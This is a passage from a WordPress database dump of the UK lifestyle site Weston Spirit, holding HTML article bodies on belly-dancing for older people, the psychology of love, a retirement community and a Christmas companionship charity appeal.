old to break a taboo?\" st_url=\"http://westonspirit.org.uk/2012/08/too-old-to-break-a-taboo/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Too old to break a taboo?\" st_url=\"http://westonspirit.org.uk/2012/08/too-old-to-break-a-taboo/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Too old to break a taboo?\" st_url=\"http://westonspirit.org.uk/2012/08/too-old-to-break-a-taboo/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Too old to break a taboo?\" st_url=\"http://westonspirit.org.uk/2012/08/too-old-to-break-a-taboo/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Are you fired up by Fifty Shades and fancy a different way to stay fit? Belly-dancing is the answer, claims Maureen Paton, who shares with us its bountiful benefits</h4>&#13;\n<p><img width=\"283\" height=\"600\" src=\"/wp-content/uploads/2012/08/Copy-of-bellydancer.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">I came very late to the idea of exercise, having ignored it for decades until I reached an ‘interesting’ age and realised I urgently needed it. Yet although strength exercises build up older muscles and increase your metabolism, which helps to keep weight and blood sugar in check, who wants to start pumping iron for the first time alongside those driven young things at the gym? So the challenge was to find an alternative that offered benefits for older people. One obvious solution was dancing, since it increases the heart rate while putting the fun into fitness. But, although a huge Strictly fan, I’ve always been hopeless at partnered dancing. I also have arthritic knees, so Latino stamping around and uber-trendy salsa is a no-no.</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">Then I discovered the delights of belly-dancing… a revelation, as it lures you in with glamorous costumes and absurdly seductive music. It exercises you from top to toe, starting with the warm-up shimmying and progressing to the waving “snake” arms and fingers.</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\"> </p>&#13;\n<h5 class=\"para para_consumer%3aconsumer_sidebar_subhead\">Health benefits</h5>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">As a non-impact exercise, it’s excellent for helping to prevent osteoporosis and for improving flexibility, especially in the spine with a repertoire of full-body, undulating moves that lengthen and strengthen the spinal column. Who would have thought that something, which frankly looks so frivolous, could make us all so fit?</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">In fact belly-dancing is something of a misnomer for what is really the groovy art of hip-dancing. My boyfriend has nicknamed it “hip-chopping” because of one particularly rapid up-and-down hip movement which fans out to emulate the cutting of a cake into slices – and which does wonders for the glutes, by the way. So all you really need for this exercise is a functioning pair of hips (or replacements), which means all shapes and sizes can do it.</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">That’s the great thing about belly-dancing: it’s tremendously inclusive. One seventy-something woman comes ?to our classes with her twenty-something granddaughter, so it can be a great activity for bringing the generations together.</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\"> </p>&#13;\n<h5>Dress to impress</h5>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">Whenever I’m guilty of a mutton-dressed-as-lamb disaster, I know where I can wear it. Belly-dancing is an excuse to bring on the bling by wearing hippie skirts and hip-sashes with those rows of coins whose rattle shows whether you’re shimmying fast enough.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_sidebar_body\">One very tall and rangy English teacher swapped her trackie bottoms for magenta harem pants with a matching jewelled bodice, giving us a glimpse of a startling personality change. It’s a dance like no other: you really can reinvent yourself.</p>&#13;\n<p class=\"para para_consumer%3aSidebar_body\">The beauty of belly-dancing was summed up by my friend Sue, 55, who said it’s the only gym class where participants socialise afterwards. And you’ll never be short of a conversation when people ask what you do for a hobby.</p>&#13;\n									</div>','Too old to break a taboo?','Are you fired up by Fifty Shades and fancy a different way to stay fit? Belly-dancing is the answer, claims Maureen Paton, who shares with us its bountiful','publish','open','open','','too-old-to-break-a-taboo','','','2018-04-02 20:04:25','2018-04-02 20:04:25','',0,'http://westonspirit.org.uk/too-old-to-break-a-taboo.asp',0,'post','',0),(247,1,'2014-02-25 11:53:50','2014-02-25 11:53:50','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 September 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Love is a drug\" st_url=\"http://westonspirit.org.uk/2012/09/love-is-a-drug/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Love is a drug\" st_url=\"http://westonspirit.org.uk/2012/09/love-is-a-drug/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Love is a drug\" st_url=\"http://westonspirit.org.uk/2012/09/love-is-a-drug/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Love is a drug\" st_url=\"http://westonspirit.org.uk/2012/09/love-is-a-drug/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Love is a drug\" st_url=\"http://westonspirit.org.uk/2012/09/love-is-a-drug/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Psychology of Love – Part 8</h3>&#13;\n<p>Scientists have known for a long time that brain chemistry is behind our sexual urges. But the mysteries of love have generally been left to writers, poets and musicians. Roxy Music and Leighton Meester have serenaded us with songs about love being a drug, and Robert Palmer was ‘Addicted to love’. While these notions of love might appear excessively romantic, neuro-science has proved that, Elvis was correct, we really ‘can’t help falling in love’.</p>&#13;\n<p>Recent research suggests that love is a biologically driven, like hunger or sex, over which we might have little control. This view of romantic attraction rests on findings by scientists studying the human brain using magnetic resonance imaging. A study, in which men and women were shown pictures of their romantic partner and a friend, revealed unique brain patterns when they were looking at their lovers. This type of research has found that different chemicals are produced by our brains when we are ‘in love’ to those that are produced when we are ‘in lust’.</p>&#13;\n<p>Most people accept that you can be ‘in love’ with one person and still be sexually attracted to another – even if it is only a fantasy. The sex drive (libido or lust) is characterised by a craving for sexual gratification and is associated primarily with androgens (estrogens and testosterone). When middle-aged men and women were given testosterone to increase sexual desire they had more sexual thoughts and higher levels of sexual activity, but they did not report any feelings of romantic passion or increased attachment to their partners.</p>&#13;\n<p>Whereas, the love drive – associated with states of euphoria, physical arousal, increased energy, heightened attention, sleeplessness, anxiety and loss of appetite – has been linked to dopamine, norepinephrine and serotonin. Being in love can produce the same high as some recreational drugs and that we can become ‘addicted to love’ is likely to be the result of increased dopamine since this chemical has been linked to cravings and addiction.</p>&#13;\n<p>All these chemicals provide a roller-coaster ride that Katie Melua sang ‘is the closest thing to crazy I have ever been’. Few of us would deny that love makes people crazy, but most of us wouldn’t expect to be certified as insane. Yet some scientists have likened ‘this crazy thing called love’ to some clinical disorders that have similar changes in brain chemistry.</p>&#13;\n<p>Obsessive-compulsive disorder (OCD) is characterised by repeated behaviours, intrusive thoughts and low levels of serotonin – just like love. In the film ‘As Good As It Gets’, Jack Nicholson portrays a man with obsessive-compulsive behaviour who falls in love. We see him obsessed with behaviours such as repeatedly washing his hands, locking his door and compelled to eat at the same restaurant, insisting on the same waitress. Although ‘love’ is not categorised as a clinical illness, during the highs and lows of falling in love, people display similar behaviours and changes in brain chemistry to those with obsessive-compulsive disorder.</p>&#13;\n<p>Most people in love might not be obsessed with cleanliness or security, but many have reported that they think about their lovers for over 85% of their waking hours. This type of persistent one-track thinking is symptomatic of obsessive-compulsive disorder, but not generally considered by the ‘sufferer’ of love as irrational. At least, those with OCD know that their behaviour is irrational, even though they can’t stop doing it.</p>&#13;\n<p>Another clinical condition that has been compared to love is cyclothymia – a bipolar disorder similar to manic-depression. It has been suggested that ‘great romantics are people suffering cyclothymia – falling truly-madly-deeply in love during periods of intense excitement. Unfortunately, the euphoria inevitably fades when melancholy sets in. Studies have revealed that love’s chemistry, specifically serotonin, produces a soothing effect on the brain. Too little has been linked to aggression, depression, anxiety, love and increased sexuality. Since alcohol appears to deplete serotonin and low levels could be responsible for reduced inhibitions, it would be wise to choose your taverns carefully.</p>&#13;\n<p>For people ‘in love’, the effects of these ‘attraction chemicals’ don’t last long. When the first flush of love turns into a long-term relationship, they are replaced by a chemical cocktail made up of the neuropeptides, oxytocin and vasopressin. This mix is believed to be responsible for producing feelings of security and emotional bonding. But even these ‘commitment chemicals’ may last only long enough for people to tolerate each other in order to reproduce, which could provide an excellent rational (or excuse) for the seven-year itch.</p>&#13;\n<p>But, if love is a type of madness induced by our own brain chemistry, then what is the cure? Since love can be more powerful that any designer drug – producing feelings similar to amphetamines and cocaine – it would appear that abstinences is the only cure. But, a life without love would be very sad indeed.</p>&#13;\n<p>While we can’t measure our brain chemistry each time that we fall in love, perhaps the best we can do is to try to recognise the symptoms of this temporary madness. Below is a list of symptoms that might help you decide if what are experiencing is the temporary insanity of love.</p>&#13;\n<p>Symptoms of Falling in Love</p>&#13;\n<p>• Feeling your partner is unique<br />• Focusing on the their positive qualities and ignoring their flaws<br />• Obsessively thinking about your partner<br />• Experiencing responses like:</p>&#13;\n<ul><li>o Exhilaration</li>&#13;\n<li>o Euphoria</li>&#13;\n<li>o Increased energy</li>&#13;\n<li>o Sleeplessness</li>&#13;\n<li>o Loss of appetite</li>&#13;\n<li>o Trembling</li>&#13;\n<li>o A pounding heart, accelerated breathing</li>&#13;\n<li>o Anxiety, panic, despair</li>&#13;\n<li>o Rapid mood changes</li>&#13;\n<li>o Listlessness</li>&#13;\n<li>o Brooding  <div class=\"woo-sc-hr\"></div></li>&#13;\n</ul><p><em><strong><a href=\"http://www.drloriboul.com/\" target=\"_blank\"><img class=\"alignright  wp-image-3065\" title=\"Dr Lori Boul\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/09/Dr-Lori-Boul1.jpg\" alt=\"\" width=\"144\" height=\"198\" /></a></strong></em><em><strong><a href=\"http://www.drloriboul.com/\" target=\"_blank\">Dr. Lori Boul</a></strong></em> gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <em><strong><a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT_TITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\">DIY Sex and Relationship Therapy</a></strong></em> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><a href=\"http://www.drloriboul.com/\" target=\"_blank\"> www.drloriboul.com</a> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','love is a drug','Psychology of Love - Part 8 Scientists have known for a long time that brain chemistry is behind our sexual urges. But the mysteries of love have generally','publish','open','open','','love-is-a-drug','','','2018-04-02 20:04:24','2018-04-02 20:04:24','',0,'http://westonspirit.org.uk/love-is-a-drug.asp',0,'post','',0),(249,1,'2018-03-11 13:09:19','2018-03-11 13:09:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">14 September 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> drloriboul\" title=\"Posts by Dr Lori Boul\" rel=\"author\"&gt;Dr Lori Boul</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Love thy Neighbour?\" st_url=\"http://westonspirit.org.uk/2012/09/love-thy-neighbour/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Love thy Neighbour?\" st_url=\"http://westonspirit.org.uk/2012/09/love-thy-neighbour/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Love thy Neighbour?\" st_url=\"http://westonspirit.org.uk/2012/09/love-thy-neighbour/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Love thy Neighbour?\" st_url=\"http://westonspirit.org.uk/2012/09/love-thy-neighbour/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Love thy Neighbour?\" st_url=\"http://westonspirit.org.uk/2012/09/love-thy-neighbour/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Psychology of Love – Part 7</h3>&#13;\n<p>It might appear that social psychology research into love and attraction should be awarded first prize when it comes to stating the blindingly obvious. For example, did you know that you are more likely to fall for someone you already know and see on a regular basis, like a neighbour, than someone you have never met! Obviously, we are not going to fall in love with people we don’t know. But, since we don’t fall for everyone we know, why do we get romantically involved with some people and not others? Psychologists have come up with a number of explanations to answer this question.</p>&#13;\n<p>It is possible that ‘some enchanted evening you will see a stranger across a crowded room’ (or in a supermarket) and fall instantly ‘in love’. However, research suggests that the Carpenters song about being ‘close to you’ is a more likely scenario for love. People who live or work closely together often end up in romantic relationships, which is perhaps not surprising since these are the people we a more likely to meet. But, being in close physical proximity to someone can lead to familiarity and, while familiarity can bread contempt, it can also fuel the fires of love.</p>&#13;\n<p>The premise that familiarity can lead to love is based on what is referred to as the ‘mere exposure effect’. In a classic experiment on attraction four female assistants were asked to attended classes and were instructed not interact with the students in the classes in any way. The women the students liked most (rated them as more attractive and intelligent) were the ones that attended the classes more frequently. So, simply being seen more often can increase the likelihood that someone will fall for you.</p>&#13;\n<p>Advertisers and PR agents are well aware of the effect of repeated exposure, but if you are still a sceptic you can test for yourself. Take a photograph of yourself and put it next to a mirror, which do you prefer the photo or your reflection in the mirror. Research has found that we prefer our mirror image, because that is what we usually see, whereas, our friends will prefer the photograph. So the next time you say you hate your photographs look at them in a mirror, they might look a little better.</p>&#13;\n<p>Although repeated exposure can lead to liking, before you start prowling your neighbourhood or work place to ‘expose’ yourself to your Mr or Ms Wonderful, research has found that ‘similarity’ outweighs both ‘proximity’ and ‘familiarity’. Psychologists have found that not only does likeness-leads-to-liking – we like people who are like us – but ‘similarity’ is what keeps a relationship together. So, Kenny Rogers really knew what love was about when he sang ‘I am you, you are me, we are the same’. But why does similarity matter? Well, people that are similar to us provide us with self-validation – if someone else is like me then I must be okay. Also, similarities make relationships easier – the more we have in common with someone the less work we have to do.</p>&#13;\n<p>But, what about the saying ‘opposites attract’, could gratifying relationships develop between shy people and extroverts, hedonists and pragmatists? For decades researchers have explored this conundrum and found that, while the romantic notion of ‘opposites attract’ might be appealing, there is little evidence that opposites stay together.</p>&#13;\n<p>That we are likely to fall for someone we see on a regular basis and is similar to us does tend to look like a case of science confirming good old-fashioned common sense. But, there have been studies that reveal one aspect of attraction that is counter intuitive. We tend to believe that the more ‘perfect’ someone is the more we will like them but psychological research shows this really isn’t the case.</p>&#13;\n<p>There have been a number of studies – referred to as ‘Pratfall’ experiments – that have found we are more inclined to like Mr/Ms Nearly Perfect than Mr/Ms Perfect. In one study, television interviews of two people, one of apparent superior ability (Mr Expert) and one of average ability (Mr Regular) were shown to different audiences. Both Mr Expert and Mr Regular were filmed conducting one perfect interview and one in which they made a mistake (spilling coffee on themselves – that’s the ‘Pratfall’). In this experiment the person rated most attractive was not the perfect Mr Expert but the nearly perfect Mr Expert when he spilled the coffee on himself. But there is a sad irony in these experiments – the effect works both ways, the blundering Mr Regular was rated least attractive. So, blundering will only make you more attractive if you’re highly competent in the first place. A famous example of the ‘Pratfall’ effect is Bill Clinton, when he was president he made a big mistake with Monica Lewinsky but his popularity didn’t suffer.</p>&#13;\n<p>I said at the beginning of this Blog that much of this research might appear to be a case of psychology stating the obvious. But, hopefully I have managed to explain why opposites don’t attract and being too ‘perfect’ can damage your chance of success in both the popularity and love stakes.</p>&#13;\n<p><strong>In Blog 8: Love is a drug.  <div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><em><strong><a href=\"http://www.drloriboul.com/\" target=\"_blank\"><img class=\"alignright  wp-image-3056\" title=\"Dr Lori Boul\" src=\"/wp-content/uploads/2012/09/Dr-Lori-Boul.jpg\" alt=\"\" width=\"146\" height=\"200\" />Dr. Lori Boul</a></strong></em> gained her PhD at the University of Sheffield in the UK and the research for her thesis, into ‘male menopause’, attracted worldwide media attention. Dr Lori is probably one of the most outspoken speakers on the topic of human sexuality and in writing her book <em><strong><a href=\"http://www.howtobooks.co.uk/display.asp?K=9781845284749&amp;sf_01=CAUTHOR&amp;sort=SORT_TITLE&amp;st_02=diy+sex&amp;sf_02=CTITLE&amp;sf_03=KEYWORD&amp;sf_04=identifier&amp;m=1&amp;dc=1\" target=\"_blank\">DIY Sex and Relationship Therapy</a></strong></em> has dared to challenge the need for face-to-face therapy. According to Dr Lori, “Good therapists can be hard to find and for many people a good spoonful of common sense is all that is needed”.</p>&#13;\n<p>Whether speaking to the general public or professionals, Dr Lori’s expertise, sensitivity and humour inspire new ways of thinking about relationships, sex and psychology. She has presented talks at national and international conferences, provides training courses and executive mentoring, and is featured as a regular guest speaker with Cunard.</p>&#13;\n<h5><a href=\"http://www.drloriboul.com/\" target=\"_blank\"> www.drloriboul.com</a> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','Love thy Neighbour?','Psychology of Love - Part 7 It might appear that social psychology research into love and attraction should be awarded first prize when it comes to stating the','publish','open','open','','love-thy-neighbour','','','2018-04-02 20:04:22','2018-04-02 20:04:22','',0,'http://westonspirit.org.uk/love-thy-neighbour.asp',0,'post','',0),(250,1,'2017-08-06 13:43:53','2017-08-06 13:43:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Comfort, independence and security\" st_url=\"http://westonspirit.org.uk/2012/12/comfort-independence-and-security/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Comfort, independence and security\" st_url=\"http://westonspirit.org.uk/2012/12/comfort-independence-and-security/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Comfort, independence and security\" st_url=\"http://westonspirit.org.uk/2012/12/comfort-independence-and-security/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Comfort, independence and security\" st_url=\"http://westonspirit.org.uk/2012/12/comfort-independence-and-security/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Comfort, independence and security\" st_url=\"http://westonspirit.org.uk/2012/12/comfort-independence-and-security/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>The beautiful town of Market Harborough provides a happy home for retirement.</h4>&#13;\n<p><img width=\"596\" height=\"397\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/MHA.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Raising a sparkling glass as she laughs with friends, Margie Fone is right to feel safe and secure, though this wasn’t always the case.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“I had an aneurysm rupture and needed major surgery,” she recalls. “At the time, I had to call the ambulance myself.”</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">It was a frightening time for Margie and her family. But now that she lives in Welland Place in Market Harborough, Margie – and her neighbours – can be reassured of care, support and assistance as and when they require it, at any time round the clock.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Vibrant community</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">Exclusively for people aged 60 and over, Welland Place forms a vibrant community of like-minded people who value their time and independence. They enjoy landscaped gardens, a cafe bistro, a library, hairdressing salon and even a swimming pool with spa and gym facilities. But beyond this is also the reassurance of a dedicated team of caring and professional staff, on site 24-hours a day, providing personalised long and short- term care and assistance when needed.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“My children are very reassured that there are staff on site here 24-hours a day, and there are call buttons if you need help,” Margie adds. “I’m only going to get older, and nobody knows what’s round the corner. It’s very good to have the help available on site, and Welland Place is so beautiful, it’s really like a five star hotel. I felt so comfortable from the first time I looked at it.”</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Day or night, professionally qualified members of staff are available to offer whatever help you need, from personal care to shopping and maintenance jobs around the home and garden. You are therefore free to enjoy your privacy, social life, hobbies and pursuits as you choose, safe in the knowledge that personalised care and support, and emergency assistance, is always on hand as and when you may require it.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Packages to suit your needs</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">Our wellbeing package includes 24-hour staff support, daily contact and varied activity options. Individual personal care can be arranged to suit your needs and take away the worry of day-to-day chores such as meal preparation, laundry or bills. In this way, you are free to spend more time enjoying activities and friendships.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">We will take time to get to know you as an individual, understanding your needs and preferences in order to support your well-being, both now and in the future.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“As soon as I saw that one apartment, I knew that was the place I should be,” smiles resident Marion Foskett. As with all residents, Marion had the option to buy, rent or part-purchase a choice of one- and two-bedroom properties for individuals, couples and those who would like some extra space for guests. Energy-efficient and well soundproofed, with underfloor heating to the bathroom, broadband facilities and a discreet touch button call system, Welland Place’s apartments bring you security and reassurance with style and elegance. They are also all covered by Premier Buildmark Home Warranties, that include cover for structural repairs.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Discover the benefits</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">All this in the beautiful town of Market Harborough, with vintage local attractions, numerous opportunities for local shopping or eating out, easy rail and road links to surrounding cities, and barely an hour from London St Pancras. Getting out and about is easy, on foot or by public transport, though Welland Place also has the added benefit of secure underground parking for those who drive.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Award-winning provider</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">Meanwhile, residents continue to enjoy spending their time in the way that they choose. Beryl Hill, for example, is interested in the WEA adult learning courses available locally, while Marion enjoys the book club and regular swimming. “And I helped to raise a nest of blackbirds whose nest was in my hedge!” she adds, laughing.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Welland Place is part of MHA, the national charity providing accommodation, care and support services to 16,000 older people. Recently named Best Residential Care Provider by leading market information provider Laing &amp; Buisson, we understand what is required for safe and fulfilling later living.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\">01858 412060</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.mha.org.uk/\" target=\"_blank\">www.mha.org.uk</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Comfort, independence and security','The beautiful town of Market Harborough provides a happy home for retirement. Raising a sparkling glass as she laughs with friends, Margie Fone is right to','publish','open','open','','comfort-independence-and-security','','','2018-04-02 20:04:21','2018-04-02 20:04:21','',0,'http://westonspirit.org.uk/comfort-independence-and-security.asp',0,'post','',0),(251,1,'2017-01-22 14:44:14','2017-01-22 14:44:14','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Companionship at Christmas\" st_url=\"http://westonspirit.org.uk/2012/12/companionship-at-christmas/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Companionship at Christmas\" st_url=\"http://westonspirit.org.uk/2012/12/companionship-at-christmas/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Companionship at Christmas\" st_url=\"http://westonspirit.org.uk/2012/12/companionship-at-christmas/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Companionship at Christmas\" st_url=\"http://westonspirit.org.uk/2012/12/companionship-at-christmas/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Companionship at Christmas\" st_url=\"http://westonspirit.org.uk/2012/12/companionship-at-christmas/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>One charity is preparing to open its doors to those facing the holiday season on their own.</h4>&#13;\n<p><img width=\"596\" height=\"419\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/Abbeyfield.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Abbeyfield, the charity that provides housing care and services to older people across the UK, is hoping older people that will be alone over Christmas – residents with elderly neighbours living alone, and family members in need of respite support over the festive period – will take up the offer of help and call the freephone number.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The charity will then match the caller with the nearest participating Abbeyfield house or care home.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Home from home</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">The aim is to give older people some company over the festive period, and pair them with others from a home-from-home alternative.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">As part of the free offer, the charity will be offering a delicious Christmas lunch and, in some cases, overnight accomodation in Abbeyfield locations across the country.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">Attack of loneliness</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">Living alone or feeling lonely is something that is sadly accepted and not discussed. However, in the run-up to Christmas when there is a barrage of cheery festive advertisements depicting happy times shared with family and friends, the sense of isolation and loneliness that usually goes unnoticed can be magnified.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">According to the Campaign to End Loneliness, loneliness still continues to plague society.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Social isolation is considered to be just as harmful as smoking or being an alcoholic and, according to recent studies, does more damage to your health than not exercising.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">As the Abbeyfield Christmas initiative begins, we would like everyone to consider someone that they know to be living alone without much contact with others to either bring this campaign to their attention, visit our website to find out more about the nearest participating house, or contact us.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">So if you are, or you know of someone who is aged 55 and over, currently living independently in their own home and will be alone or lonely over Christmas, then the charity would like to hear from you.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">The campaign has already received the backing from a number of MPs, other charitable organisations and local authorities charged with taking care of the elderly around the country.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Please call 0845 052 3553 if you wish to find out more about Companionship at Christmas. Or if you wish to volunteer for the Christmas initiative, contact the charity on 01727 857 536.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Paul Allen, Abbeyfield’s CEO says: “Our aim is to enhance the quality of life for older people. We hope that people accept our invitation and contact us now – it will really enhance the Christmas experience.”</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\">0845 052 3553</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.abbeyfield.com/\" target=\"_blank\">www.abbeyfield.com</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Companionship at Christmas','One charity is preparing to open its doors to those facing the holiday season on their own. Abbeyfield, the charity that provides housing care and services','publish','open','open','','companionship-at-christmas','','','2018-04-02 20:04:19','2018-04-02 20:04:19','',0,'http://westonspirit.org.uk/companionship-at-christmas.asp',0,'post','',0),(252,1,'2014-06-06 11:47:24','2014-06-06 11:47:24','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 December 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get up and go – December\" st_url=\"http://westonspirit.org.uk/2012/12/get-up-and-go-december/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get up and go – December\" st_url=\"http://westonspirit.org.uk/2012/12/get-up-and-go-december/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get up and go – December\" st_url=\"http://westonspirit.org.uk/2012/12/get-up-and-go-december/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get up and go – December\" st_url=\"http://westonspirit.org.uk/2012/12/get-up-and-go-december/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get up and go – December\" st_url=\"http://westonspirit.org.uk/2012/12/get-up-and-go-december/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Christmas all wrapped up</p>&#13;\n<p>This month Weston Spirit brings you a special festive edition, featuring present ideas, Europe’s best Christmas markets  and alternative ways to ring in 2018. </p>&#13;\n<p></p><div><object style=\"width:610px;height:400px\"><param name=\"movie\" 